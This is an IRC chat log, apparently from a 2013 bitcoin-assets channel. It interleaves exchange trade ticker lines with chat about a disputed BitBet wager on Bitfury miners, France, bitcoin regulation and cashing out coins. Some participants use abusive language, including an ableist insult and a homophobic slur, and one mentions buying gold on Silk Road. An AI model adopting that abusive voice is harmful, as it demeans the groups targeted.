@ 0.00088452 = 5.8378 BTC [-] Sep 08 01:52:09 if he says "our h-cards are underperforming."................. Sep 08 01:52:21 and you expect that there might be a fix for that coming in 5 days or so? Sep 08 01:52:27 dude admit it Sep 08 01:52:30 you tried to benefit it Sep 08 01:52:33 Anduck: he said the 400Gh unit doesn't do 400Gh. Sep 08 01:52:42 he said 16 h-cards don't do it Sep 08 01:52:50 Anduck: if its just a resistor to change , then its easy to fix and ship in 5 days Sep 08 01:52:56 (which, btw now do 380 or 375 ghash already) Sep 08 01:52:57 or maybe even a software firmware issue Sep 08 01:53:06 wogwog_: it's not really easy change..... Sep 08 01:53:06 380 < 400 Sep 08 01:53:15 [BTCTC] [DMS.MINING] 2 @ 0.0025 = 0.005 BTC [-] Sep 08 01:53:22 thousands of boards and the changing of the resistor is hard Sep 08 01:53:37 plus it ducks up the efficiency part a bit Sep 08 01:53:45 they're made to be as energy efficient as possible Sep 08 01:54:03 [HAVELOCK] [XBOND] 10 @ 0.0011 = 0.011 BTC [+] Sep 08 01:54:27 Anduck: regardless, its possible, which means i didn't know the outcome. they only had to fix and ship 1 to for the bet to be a yes. although at least i think that you are starting to admit that a unit is 1M-board Sep 08 01:54:52 Anduck: also, bitbet says that bets aren't cancelled even if it becomes impossible to win. its in the FAQ. Sep 08 01:55:03 Anduck: so you take that risk when betting Sep 08 01:55:19 yeah yeah Sep 08 01:55:38 but since you dont even admit of being the starter of the thread... Sep 08 01:55:49 and i've made clear what i think a unit means.... Sep 08 01:55:59 it's really not worth the discussion, right? Sep 08 01:57:22 [BTCTC] [DMS.PURCHASE] 100 @ 0.01209 = 1.209 BTC [-] Sep 08 01:57:39 if you don't think so, feel free to stop discussing Sep 08 01:58:03 hopefully punin will clearly define what a 'unit' is and put this to rest Sep 08 01:58:22 i'll be monitoring the thread for that. Sep 08 01:58:58 punin's definition of a unit has no bearing on the bet Sep 08 01:59:01 haha pankkake keeps posting in that thread... he thinkts the thread is a troll, but he keeps posting Sep 08 01:59:22 I don't understand your point Sep 08 01:59:32 Luke-Jr: it does, because he is bitfurystrikesback.com , which is where the performance of the unit was advertised -- and the bet states it must follow the advertised performance Sep 08 01:59:33 [BTCTC] [ACTIVEMINING] 12 @ 0.003917 = 0.047 BTC [-] Sep 08 01:59:40 Luke-Jr: read english Sep 08 01:59:47 performance, not "unit definition" Sep 08 01:59:49 [BTCTC] [ACTIVEMINING] 12 @ 0.003916 = 0.047 BTC [-] Sep 08 01:59:59 performance of the unit... Sep 08 02:00:02 which is 1M-board Sep 08 02:00:19 the bet did not define it as a 1M-board Sep 08 02:00:26 but the website did Sep 08 02:00:32 the website is not part of the bet Sep 08 02:00:33 which is why the bet says 'as advertsied' Sep 08 02:00:35 no, you did Sep 08 02:00:37 yes it is!!!!! lol Sep 08 02:00:40 read the bet Sep 08 02:00:45 i hope fractal makes the 0% site so i can make a bet about which bitbet bet will next take up all the fucking chan space on -assets. Sep 08 02:00:57 Bitfurystrikesback.com (Bitfury EU reseller) will ship their 25 and 400 gigahash mining units before 1st of September 2013. Devices must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W) in order to be accepted as valid. Atleast 5 deliveries confirmed by respected members of the community required. Sep 08 02:01:12 'must meet advertised performance' and 400Gh UNIT Sep 08 02:01:25 http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 08 02:01:25 which is this Sep 08 02:01:29 wogwog_: go back the the dictionary Sep 08 02:01:31 damn Luke-Jr , i thought you could read man Sep 08 02:01:42 that link does not use the term "unit" anywhere Sep 08 02:01:54 miner == unit Sep 08 02:02:03 that's not what my dictionary says Sep 08 02:02:26 thats what the bet says Sep 08 02:02:45 nope Sep 08 02:03:08 Luke-Jr: yes. Sep 08 02:03:23 the only good thing a dictionnary would be for now is bashing wogwog's head Sep 08 02:03:36 man, its funny, you guys think i'm trolling.... but if i was, you keep feeding the troll. why not just admit you're wrong? Sep 08 02:03:38 the bet did not define "unit" at all Sep 08 02:03:51 it simply said that the 400 Gh must be 400 W or better Sep 08 02:03:51 pankkake: thats not nice. you're not a nice person. Sep 08 02:03:56 pankkake: that statement proves that you're a bad person and are likely a paid shill Sep 08 02:04:10 Luke-Jr: no it didn't Sep 08 02:04:20 the term "unit" used in the bet infers that those who paid for that item got 400 Gh/s running under 400 W Sep 08 02:04:22 they did Sep 08 02:04:33 no it doesn't Sep 08 02:04:38 does Sep 08 02:04:46 does not Sep 08 02:04:54 now stop being a retard and shut up Sep 08 02:05:13 the term unit in the bet refers to this http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 08 02:05:20 its right there on the forums Sep 08 02:05:25 he's the one who runs the company Sep 08 02:05:25 he says that the 400Gh UNIT underperforms Sep 08 02:05:36 you basically can't come to terms with the fact that you're wrong. its amazing. Sep 08 02:05:47 !ticker m ^OIX Sep 08 02:05:49 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 195.15803475 / 195.15803475 (4 shares, 1.65 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Sep 08 02:05:50 2 Units != 1 Unit Sep 08 02:05:53 wogwog_: I intend to get paid writing valid arguments, talking about dictionnaries on your head wouldn't be very good Sep 08 02:06:18 unless my client would want you to get MAD Sep 08 02:07:32 pankkake: also, didn't your troll-for-hire thread say you refused to use your own identity with the trolling? Sep 08 02:07:57 yes, as I point repeatedly :( Sep 08 02:08:46 [BTCTC] [ACTIVEMINING] 38 @ 0.003916 = 0.1488 BTC [-] Sep 08 02:08:48 [BTCTC] [ACTIVEMINING] 10 @ 0.003902 = 0.039 BTC [-] Sep 08 02:10:15 pankkake: btw, have you ever been hired to troll me? Sep 08 02:10:39 no, lol Sep 08 02:10:43 surprising Sep 08 02:10:59 but here is a little troll: you interact with me already with another identity Sep 08 02:11:06 I guess the people who hate me are already trolls on their own, so they don't need to hire one <.< Sep 08 02:11:15 (if you ever guess it, don't guess it in public, it's my real name) Sep 08 02:11:21 lol Sep 08 02:11:31 wogwog? Sep 08 02:11:49 that would be ducked up situation right Sep 08 02:12:06 XD Sep 08 02:12:08 Yes I am Dr. Wogwog Dombalog, King of the Blululus Sep 08 02:12:14 [BTCTC] [S.MPOE-PT] 7 @ 0.0007851 = 0.0055 BTC [-] Sep 08 02:12:15 [BTCTC] [S.MPOE-PT] 5 @ 0.0007851 = 0.0039 BTC [-] Sep 08 02:12:34 ohh i know the blululus guis Sep 08 02:13:51 [BTCTC] [LABCOIN] 8 @ 0.003474 = 0.0278 BTC [+] Sep 08 02:13:51 [BTCTC] [LABCOIN] 5 @ 0.003475 = 0.0174 BTC [+] Sep 08 02:13:52 pankkake: did I meet you at the conference? Sep 08 02:13:52 [BTCTC] [LABCOIN] 3 @ 0.003478 = 0.0104 BTC [+] Sep 08 02:13:53 [BTCTC] [LABCOIN] 180 @ 0.003478 = 0.626 BTC [+] Sep 08 02:14:04 no, only online Sep 08 02:14:17 haven't met any famous bitcoiner yet :( Sep 08 02:14:19 [BTCTC] [NASTY-PT] 2 @ 0.001875 = 0.0038 BTC [-] Sep 08 02:14:24 twist: pankkake is a gurl. Sep 08 02:14:26 and I usually meet as pankkake Sep 08 02:14:40 mircea_popescu: I wish! I would just whore myself for bitcoins Sep 08 02:14:55 [BTCTC] [LABCOIN] 7 @ 0.003479 = 0.0244 BTC [+] Sep 08 02:14:58 Isn't mircea's a girl name? Sep 08 02:15:04 -'s Sep 08 02:15:14 well it's certainly becoming one these days, what with that american starlet. Sep 08 02:15:25 but otherwise it's a thousand old male name. Sep 08 02:15:33 +year Sep 08 02:15:43 [BTCTC] [LABCOIN] 1 @ 0.003479 BTC [+] Sep 08 02:16:02 the -a is confusing, it usually hints female Sep 08 02:16:26 pankkake: it's because he uses a female avatar on bitcointroll Sep 08 02:16:36 that actually is a girl. Sep 08 02:16:43 [BTCTC] [DMS.SELLING] 1 @ 0.009795 BTC [-] Sep 08 02:17:57 [BTCTC] [DMS.MINING] 10 @ 0.002895 = 0.029 BTC [+] Sep 08 02:20:08 [BTCTC] [DMS.SELLING] 4 @ 0.009795 = 0.0392 BTC [-] Sep 08 02:20:10 [BTCTC] [DMS.SELLING] 50 @ 0.009796 = 0.4898 BTC [+] Sep 08 02:21:51 [MPEX] [S.MPOE] 466 @ 0.00088452 = 0.4122 BTC [-] Sep 08 02:21:53 [MPEX] [S.MPOE] 4584 @ 0.0008842 = 4.0532 BTC [-] Sep 08 02:23:01 [BTCTC] [DMS.PURCHASE] 5 @ 0.01209 = 0.0605 BTC [-] Sep 08 02:24:17 Who are famous bitcoiners? Sep 08 02:25:40 [BTCTC] [DMS.PURCHASE] 50 @ 0.01209 = 0.6045 BTC [-] Sep 08 02:25:47 me apparently Sep 08 02:25:57 haha Sep 08 02:26:17 [BTCTC] [DMS.MINING] 1 @ 0.002504 BTC [-] Sep 08 02:26:50 [BTCTC] [DMS.MINING] 4 @ 0.002502 = 0.01 BTC [-] Sep 08 02:27:10 [BTCTC] [DMS.MINING] 45 @ 0.002502 = 0.1126 BTC [-] Sep 08 02:27:44 well I had in mind guys behind known services/software; for example the bitcoin-central guys are living pretty close to me I think Sep 08 02:28:06 [BTCTC] [LABCOIN] 20 @ 0.003412 = 0.0682 BTC [-] Sep 08 02:28:07 [BTCTC] [LABCOIN] 1000 @ 0.003411 = 3.411 BTC [-] Sep 08 02:28:08 [BTCTC] [LABCOIN] 738 @ 0.003403 = 2.5114 BTC [-] Sep 08 02:28:10 [BTCTC] [LABCOIN] 308 @ 0.003402 = 1.0478 BTC [-] Sep 08 02:28:11 [BTCTC] [LABCOIN] 120 @ 0.003381 = 0.4057 BTC [-] Sep 08 02:30:51 [MPEX] [S.MPOE] 4300 @ 0.00088829 = 3.8196 BTC [+] Sep 08 02:31:03 u live in france? Sep 08 02:31:35 yes Sep 08 02:32:40 french always loses wars Sep 08 02:32:45 and love complaining Sep 08 02:32:56 u know france has lost like 1 war? Sep 08 02:32:59 =P Sep 08 02:33:07 won, you mean? Sep 08 02:33:10 but people only remembers WWII Sep 08 02:33:19 no, they've lost just WWII Sep 08 02:33:22 [BTCTC] [LABCOIN] 607 @ 0.003361 = 2.0401 BTC [-] Sep 08 02:33:27 pretty much every other war they've won Sep 08 02:33:40 but people remembers france as a loser country Sep 08 02:34:20 France sucks anymore Sep 08 02:34:59 French Revolution on onward especially, France is like one of the worst countries of all time Sep 08 02:35:05 well, there's Algeria Sep 08 02:37:39 French people who are proud of Napolean disgust me Sep 08 02:38:26 I'd rather lose wars Sep 08 02:38:37 [BTCTC] [BASIC-MINING] 1 @ 0.1198 BTC [+] Sep 08 02:38:51 [HAVELOCK] [XBOND] 250 @ 0.00107 = 0.2675 BTC [-] Sep 08 02:38:55 [HAVELOCK] [XBOND] 400 @ 0.001066 = 0.4264 BTC [-] Sep 08 02:38:58 [HAVELOCK] [XBOND] 20 @ 0.001065 = 0.0213 BTC [-] Sep 08 02:39:02 [HAVELOCK] [XBOND] 10 @ 0.00106001 = 0.0106 BTC [-] Sep 08 02:39:06 [HAVELOCK] [XBOND] 20 @ 0.00106 = 0.0212 BTC [-] Sep 08 02:39:09 [HAVELOCK] [XBOND] 25 @ 0.00105501 = 0.0264 BTC [-] Sep 08 02:39:13 [HAVELOCK] [XBOND] 350 @ 0.001055 = 0.3693 BTC [-] Sep 08 02:39:16 [HAVELOCK] [XBOND] 666 @ 0.00105026 = 0.6995 BTC [-] Sep 08 02:39:20 [HAVELOCK] [XBOND] 20 @ 0.0010501 = 0.021 BTC [-] Sep 08 02:39:23 [HAVELOCK] [XBOND] 25 @ 0.00105002 = 0.0263 BTC [-] Sep 08 02:39:27 [HAVELOCK] [XBOND] 90 @ 0.00105001 = 0.0945 BTC [-] Sep 08 02:39:30 http://www.connexionfrance.com/American-French-stereotype-TF1-prejudice-top-10-14195-view-article.html Sep 08 02:39:31 [HAVELOCK] [XBOND] 2124 @ 0.00105 = 2.2302 BTC [-] Sep 08 02:39:48 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] Sep 08 02:39:50 [BTCTC] [COGNITIVE] 1 @ 0.3206 BTC [+] Sep 08 02:40:05 [BTCTC] [DMS.MINING] 9 @ 0.002504 = 0.0225 BTC [+] Sep 08 02:40:41 1 is true, 3 isn't at all and is very weird, 4 wine and cheese yes, others no Sep 08 02:41:31 9 is very weird too. the only smelly people I meet are tourists and the homeless Sep 08 02:42:38 pankkake: history aside, the laws suck bad Sep 08 02:43:05 [BTCTC] [DMS.PURCHASE] 5 @ 0.01209 = 0.0605 BTC [-] Sep 08 02:43:05 I would never live there as it is now Sep 08 02:43:24 I'm not really sure where to go Sep 08 02:43:29 there is nowhere Sep 08 02:43:30 but we are headed for some dark times Sep 08 02:43:37 the US is the best there is today, and it sucks pretty bad too Sep 08 02:44:05 and if you try to make a new manmade isle, some existing governments will steal it Sep 08 02:44:29 wish moon colonies were affordable Sep 08 02:44:41 it'd be hard to bother us there Sep 08 02:44:53 I learned about the US gold confiscations, France is certainly gearing towards doing that, but there are signs in the US too - namely, preventing you from buying it anonymously Sep 08 02:45:18 I already can't buy it anonymously, last I checked Sep 08 02:45:22 to bitcoin, mes ami Sep 08 02:45:41 you can buy gold on silk road Sep 08 02:45:41 benkay: unfortunately, governments could kill bitcoin overnight if they really wanted to Sep 08 02:45:49 didn't compare prices, it's likely expensive Sep 08 02:45:51 best to buy some eastern european country Sep 08 02:46:00 Luke-Jr: do go on. Sep 08 02:46:03 or southern american, better climate Sep 08 02:46:32 benkay: even with all the ASICs ordered online, it probably won't be even 0.1% of the defense budget of even small nations :/ Sep 08 02:47:32 true dat Sep 08 02:47:41 let's stay under the radar for a little longer, shall we? Sep 08 02:48:03 or add proof of stake? ;) Sep 08 02:48:15 i'm hoping to sell asic floor tile heaters at some point in the next decade Sep 08 02:48:16 pankkake: there hasn't been a usable implementation done yet :/ Sep 08 02:48:50 as well as asic water heaters Sep 08 02:48:54 and asic furnaces Sep 08 02:49:07 asic saunas Sep 08 02:49:12 why not Sep 08 02:49:20 great heat source Sep 08 02:50:02 i'd ipo something idiotic sounding like ASICHEAT but then idiots would fund it and i'd have to go fucking deal with stuff Sep 08 02:51:10 rent on next office is going to include utilities tho i tell you that Sep 08 02:51:30 ;;seen Sep 08 02:51:31 (seen [] ) -- Returns the last time was seen and what was last seen saying. is only necessary if the message isn't sent on the channel itself. may contain * as a wildcard. Sep 08 02:51:35 ;;seen smickles Sep 08 02:51:36 smickles was last seen in #bitcoin-assets 4 days, 4 hours, 17 minutes, and 36 seconds ago: ;;ident Sep 08 02:52:11 i've seriously been pondering doing a warehouse or a shittily insulated office and putting ASIC blades by every desk Sep 08 02:52:23 "just run your heater" Sep 08 02:52:27 "what if it's not cold?" Sep 08 02:52:41 "..." Sep 08 02:52:50 "run your heater." Sep 08 03:06:00 [HAVELOCK] [XBOND] 2 @ 0.00114567 = 0.0023 BTC [+] Sep 08 03:08:22 well, there's Algeria << now we know she's really french :D Sep 08 03:08:25 [HAVELOCK] [XBOND] 1 @ 0.00114666 BTC [+] Sep 08 03:09:43 [BTCTC] [DMS.MINING] 11 @ 0.002879 = 0.0317 BTC [+] Sep 08 03:09:44 Luke-Jr they could kill my erection, and that is about the limit of what they can do. Sep 08 03:09:54 put that pelosi underspeaker on webcam or something Sep 08 03:11:13 01:59.51 ( Luke-Jr ) the US is the best there is today, and it sucks pretty bad too [01:43:31] Sep 08 03:11:28 recheck your pill schedule Sep 08 03:12:22 benkay you know, you might grossly overestimate the hundred bitcoin teh muppets keep moving bakc and forth. Sep 08 03:13:09 blah Sep 08 03:13:16 log.bitcoin-assets Sep 08 03:13:17 tldr Sep 08 03:14:10 mircea_popescu: heh. there's not that much in the entire mining scam? Sep 08 03:14:25 hit me up if there was anything of importance Sep 08 03:14:54 benkay yes there's that much, in the sense that muppets keep buying btc. but the pool keeps getting drained and the sharks keep multiplying so... Sep 08 03:15:52 there's some time, then. Sep 08 03:16:13 i'm just going to keep on keeping on with my personal capitalization project. Sep 08 03:17:37 can't hurt. Sep 08 03:22:33 [BTCTC] [DMS.MINING] 5 @ 0.002538 = 0.0127 BTC [-] Sep 08 03:23:37 not even a boob or anything eh Sep 08 03:23:45 [BTCTC] [DMS.PURCHASE] 1 @ 0.01209 BTC [-] Sep 08 03:24:45 kakobrekla how was pula ? Sep 08 03:25:08 quite decent really Sep 08 03:25:18 dja know it's cock in romanian ? Sep 08 03:25:25 lol no Sep 08 03:26:01 yup. Sep 08 03:26:32 ill let everyone know next time Sep 08 03:26:54 i think they probably do by now lol Sep 08 03:27:35 mebbe Sep 08 03:27:39 still a good rub in the face Sep 08 03:28:04 [BTCTC] [DMS.MINING] 1 @ 0.002538 BTC [-] Sep 08 03:36:44 [BTCTC] [DMS.MINING] 1 @ 0.002504 BTC [-] Sep 08 03:41:25 [BTCTC] [ASICMINER-PT] 1 @ 2.213 BTC [+] Sep 08 03:41:42 [BTCTC] [ASICMINER-PT] 1 @ 2.213 BTC [+] Sep 08 03:46:06 [MPEX] [S.BBET] [PAID] 2.69851570 BTC to 3`000`000 shares, 89 satoshi per share Sep 08 03:49:05 so: retroshare. anyone played with it? Sep 08 03:49:17 link? Sep 08 03:49:32 http://en.wikipedia.org/wiki/RetroShare Sep 08 03:49:33 retroshare.sourceforge.net/wiki/index.php/Main_Page Sep 08 03:49:33 no but the gpg part at least is the righ way Sep 08 03:49:34 ? Sep 08 03:49:53 thestringpuller: same thing Sep 08 03:51:46 [BTCTC] [LABCOIN] 3 @ 0.003478 = 0.0104 BTC [+] Sep 08 03:51:47 [BTCTC] [LABCOIN] 37 @ 0.003479 = 0.1287 BTC [+] Sep 08 03:52:28 tried to install it but the dependencies annoyed me Sep 08 03:52:31 I like the name Sep 08 03:52:43 actually wanted to use that name for a different project of mine Sep 08 03:52:48 https://bitcointalk.org/index.php?topic=289958.0;topicseen Sep 08 03:52:53 Eve Online corp Bitcoin Hegemony Sep 08 03:53:05 lets copy all the things! Sep 08 03:54:13 must show you're doing something right Sep 08 03:54:55 no, i'm the only dude in bitcoin doing EVERYTHING WRONG ALL THE TIME Sep 08 03:54:57 just ask around. Sep 08 04:02:32 http://www.loper-os.org/?p=1277 Sep 08 04:02:37 Loper OS » RIP Douglas Engelbart. Sep 08 04:02:41 i like the anger in the 1st paragraph lol. Sep 08 04:04:09 ;;calc 0.001055 * 500 Sep 08 04:04:10 0.5275 Sep 08 04:04:28 rip phag Sep 08 04:04:37 ;;calc 0.5275 + 0.23480582 Sep 08 04:04:38 0.76230582 Sep 08 04:04:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000642 BTC [+] Sep 08 04:11:38 [HAVELOCK] [XBOND] 1000 @ 0.001055 = 1.055 BTC [-] Sep 08 04:11:57 [HAVELOCK] [XBOND] 2000 @ 0.001051 = 2.102 BTC [-] Sep 08 04:12:20 [HAVELOCK] [XBOND] 3995 @ 0.00105 = 4.1948 BTC [-] Sep 08 04:13:12 what is the fastest way to get money out to a US account? Sep 08 04:13:20 bitstamp, coinbase? Sep 08 04:13:34 i got coin, want to sell and want to get $ in less then a week Sep 08 04:14:21 otc Sep 08 04:16:47 [BTCTC] [ACTIVEMINING] 3 @ 0.003916 = 0.0117 BTC [+] Sep 08 04:16:50 yeah OTC. Sep 08 04:18:50 pff OTC as too high a premium Sep 08 04:19:12 well, you said you want it in this decade. Sep 08 04:19:16 you cant have it all Sep 08 04:19:24 just like i cant have it all, goddamn external pillows. Sep 08 04:19:43 coinbase in 2-3 days... seems pretty beneath a decade Sep 08 04:20:33 well it seems you already have the answer to the question you are asking Sep 08 04:20:47 got it in another IRC channel at the same time, but yeah Sep 08 04:21:06 2-3 days after you auth/verify though, right? Sep 08 04:21:18 yeah, have to check how long that takes Sep 08 04:22:49 30 days. Sep 08 04:32:46 [BTCTC] [LABCOIN] 7 @ 0.003479 = 0.0244 BTC [+] Sep 08 04:37:03 [BTCTC] [DMS.PURCHASE] 5 @ 0.01209 = 0.0605 BTC [-] Sep 08 04:37:52 [HAVELOCK] [AM100] 1 @ 0.020285 BTC [+] Sep 08 04:38:45 [HAVELOCK] [LABCO] 1 @ 0.00329 BTC [-] **** BEGIN LOGGING AT Sun Sep 8 12:46:36 2013 Sep 08 12:55:07 "Governments are good at cutting off the heads of a centrally controlled networks like Napster, but pure P2P networks like Gnutella and Tor seem to be holding their own." Sep 08 12:55:18 as time goes on this starts to seem like it's made out of pure herp. Sep 08 14:12:22 gnutella/tor are still far from dying, and then we have freenetproject Sep 08 14:16:51 bot down? Sep 08 14:22:30 jurov well yea, it's true, but let's preserve a moment of gloominess :( Sep 08 14:22:32 i mean :) Sep 08 14:58:39 yea, let's relish in glooming :) Sep 08 15:39:35 http://www.latimes.com/business/la-fi-hiltzik-20130908,0,2539608.column Sep 08 15:39:42 where burnside got his advice? Sep 08 15:40:04 S&P raises desperate defense against government lawsuit - latimes.com Sep 08 15:40:29 Its ratings, it says, "are not indicators of investment merit, are not recommendations to buy, sell or hold any security, and should not be relied upon as investment advice." Sep 08 16:36:17 [BTCTC] [ASICMINER-PT] 2 @ 2.36 = 4.72 BTC [+] Sep 08 16:36:18 [BTCTC] [ASICMINER-PT] 1 @ 2.36 BTC [+] Sep 08 16:36:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.021 = 0.105 BTC [-] Sep 08 16:36:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.02099 = 0.1259 BTC [-] Sep 08 16:36:20 [BTCTC] [TAT.ASICMINER] 33 @ 0.02099 = 0.6927 BTC [-] Sep 08 16:36:21 [BTCTC] [TAT.ASICMINER] 33 @ 0.02098 = 0.6923 BTC [-] Sep 08 16:36:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02097 BTC [-] Sep 08 16:36:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.02095 = 0.0838 BTC [-] Sep 08 16:36:24 [BTCTC] [TAT.ASICMINER] 22 @ 0.02094 = 0.4607 BTC [-] Sep 08 16:36:25 [BTCTC] [TAT.ASICMINER] 43 @ 0.02091 = 0.8991 BTC [-] Sep 08 16:36:26 [BTCTC] [TAT.ASICMINER] 100 @ 0.0209 = 2.09 BTC [-] Sep 08 16:36:27 [BTCTC] [TAT.ASICMINER] 115 @ 0.0209 = 2.4035 BTC [-] Sep 08 16:44:16 [BTCTC] [LABCOIN] 987 @ 0.003499 = 3.4535 BTC [-] Sep 08 16:45:36 [BTCTC] [LABCOIN] 1372 @ 0.00349 = 4.7883 BTC [-] Sep 08 16:47:00 [BTCTC] [LABCOIN] 1200 @ 0.003499 = 4.1988 BTC [+] Sep 08 16:47:23 [BTCTC] [LABCOIN] 600 @ 0.003499 = 2.0994 BTC [+] Sep 08 16:47:56 [BTCTC] [LABCOIN] 113 @ 0.003499 = 0.3954 BTC [+] Sep 08 16:49:07 [BTCTC] [LABCOIN] 10 @ 0.0035 = 0.035 BTC [+] Sep 08 16:50:55 [HAVELOCK] [XBOND] 1 @ 0.00113999 BTC [-] Sep 08 17:09:43 [BTCTC] [LABCOIN] 100 @ 0.003497 = 0.3497 BTC [-] Sep 08 17:14:42 [BTCTC] [LABCOIN] 67 @ 0.003497 = 0.2343 BTC [-] Sep 08 17:15:27 [BTCTC] [TAT.ASICMINER] 58 @ 0.02199 = 1.2754 BTC [+] Sep 08 17:21:47 [BTCTC] [LABCOIN] 190 @ 0.003497 = 0.6644 BTC [-] Sep 08 17:30:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.022 = 0.11 BTC [+] Sep 08 17:30:59 [BTCTC] [TAT.ASICMINER] 1302 @ 0.02199 = 28.631 BTC [-] Sep 08 17:32:48 [BTCTC] [LABCOIN] 152 @ 0.0035 = 0.532 BTC [+] Sep 08 17:34:55 [BTCTC] [DMS.MINING] 3 @ 0.002802 = 0.0084 BTC [-] Sep 08 17:34:56 [BTCTC] [DMS.MINING] 500 @ 0.002802 = 1.401 BTC [-] Sep 08 17:34:57 [BTCTC] [DMS.MINING] 24 @ 0.002801 = 0.0672 BTC [-] Sep 08 17:34:58 [BTCTC] [DMS.MINING] 425 @ 0.002801 = 1.1904 BTC [-] Sep 08 17:34:59 [BTCTC] [DMS.MINING] 849 @ 0.0028 = 2.3772 BTC [-] Sep 08 17:38:31 [BTCTC] [LABCOIN] 468 @ 0.0035 = 1.638 BTC [+] Sep 08 17:38:44 [BTCTC] [ASICMINER-PT] 1 @ 2.34 BTC [-] Sep 08 17:39:12 [BTCTC] [LABCOIN] 125 @ 0.00352 = 0.44 BTC [+] Sep 08 17:40:51 [BTCTC] [LABCOIN] 120 @ 0.00352 = 0.4224 BTC [+] Sep 08 17:41:32 [BTCTC] [LABCOIN] 3100 @ 0.00352 = 10.912 BTC [+] Sep 08 17:41:45 [BTCTC] [LABCOIN] 200 @ 0.00352 = 0.704 BTC [+] Sep 08 17:42:00 [BTCTC] [LABCOIN] 200 @ 0.00352 = 0.704 BTC [+] Sep 08 17:42:12 [BTCTC] [LABCOIN] 200 @ 0.00352 = 0.704 BTC [+] Sep 08 17:42:22 [BTCTC] [LABCOIN] 827 @ 0.00352 = 2.911 BTC [+] Sep 08 17:42:23 [BTCTC] [LABCOIN] 222 @ 0.003532 = 0.7841 BTC [+] Sep 08 17:42:25 [BTCTC] [LABCOIN] 2019 @ 0.003539 = 7.1452 BTC [+] Sep 08 17:42:26 [BTCTC] [LABCOIN] 200 @ 0.003568 = 0.7136 BTC [+] Sep 08 17:42:27 [BTCTC] [LABCOIN] 102 @ 0.00358 = 0.3652 BTC [+] Sep 08 17:42:28 [BTCTC] [LABCOIN] 295 @ 0.003594 = 1.0602 BTC [+] Sep 08 17:42:29 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [+] Sep 08 17:42:30 [BTCTC] [LABCOIN] 325 @ 0.0036 = 1.17 BTC [+] Sep 08 17:42:31 [BTCTC] [LABCOIN] 100 @ 0.0036 = 0.36 BTC [+] Sep 08 17:42:32 [BTCTC] [LABCOIN] 150 @ 0.003626 = 0.5439 BTC [+] Sep 08 17:42:33 [BTCTC] [LABCOIN] 96 @ 0.003638 = 0.3492 BTC [+] Sep 08 17:42:33 [BTCTC] [LABCOIN] 790 @ 0.003645 = 2.8796 BTC [+] Sep 08 17:42:35 [BTCTC] [LABCOIN] 250 @ 0.00365 = 0.9125 BTC [+] Sep 08 17:42:36 [BTCTC] [LABCOIN] 168 @ 0.00365 = 0.6132 BTC [+] Sep 08 17:42:38 [BTCTC] [LABCOIN] 168 @ 0.00365 = 0.6132 BTC [+] Sep 08 17:43:12 [BTCTC] [LABCOIN] 233 @ 0.00368 = 0.8574 BTC [+] Sep 08 17:43:14 [BTCTC] [LABCOIN] 168 @ 0.003685 = 0.6191 BTC [+] Sep 08 17:43:15 [BTCTC] [LABCOIN] 2043 @ 0.003686 = 7.5305 BTC [+] Sep 08 17:43:16 [BTCTC] [LABCOIN] 100 @ 0.003693 = 0.3693 BTC [+] Sep 08 17:43:17 [BTCTC] [LABCOIN] 1743 @ 0.003694 = 6.4386 BTC [+] Sep 08 17:43:47 [BTCTC] [TAT.ASICMINER] 75 @ 0.022 = 1.65 BTC [+] Sep 08 17:43:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.0221 = 0.442 BTC [+] Sep 08 17:44:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0222 BTC [+] Sep 08 17:44:07 [BTCTC] [TAT.ASICMINER] 7 @ 0.02239 = 0.1567 BTC [+] Sep 08 17:44:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0224 BTC [+] Sep 08 17:44:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0228 BTC [+] Sep 08 17:47:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.02298 = 0.0689 BTC [+] Sep 08 17:47:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.023 = 0.299 BTC [+] Sep 08 17:47:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0232 BTC [+] Sep 08 17:48:00 [BTCTC] [TAT.ASICMINER] 30 @ 0.0233 = 0.699 BTC [+] Sep 08 17:48:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.02334 = 0.1167 BTC [+] Sep 08 17:48:02 [BTCTC] [TAT.ASICMINER] 30 @ 0.02334 = 0.7002 BTC [+] Sep 08 17:48:03 [BTCTC] [TAT.ASICMINER] 43 @ 0.02349 = 1.0101 BTC [+] Sep 08 17:50:14 [BTCTC] [DMS.MINING] 1 @ 0.00281 BTC [+] Sep 08 17:50:30 [BTCTC] [DMS.MINING] 24 @ 0.0028 = 0.0672 BTC [-] Sep 08 17:51:26 [BTCTC] [LABCOIN] 100 @ 0.00369 = 0.369 BTC [-] Sep 08 17:52:53 [BTCTC] [LABCOIN] 50 @ 0.00369 = 0.1845 BTC [-] Sep 08 17:55:24 [BTCTC] [LABCOIN] 112 @ 0.00369 = 0.4133 BTC [-] Sep 08 17:56:15 [BTCTC] [LABCOIN] 100 @ 0.00369 = 0.369 BTC [-] Sep 08 17:59:42 [BTCTC] [ASICMINER-PT] 1 @ 2.359 BTC [+] Sep 08 18:03:45 [BTCTC] [ASICMINER-PT] 4 @ 2.36 = 9.44 BTC [+] Sep 08 18:04:50 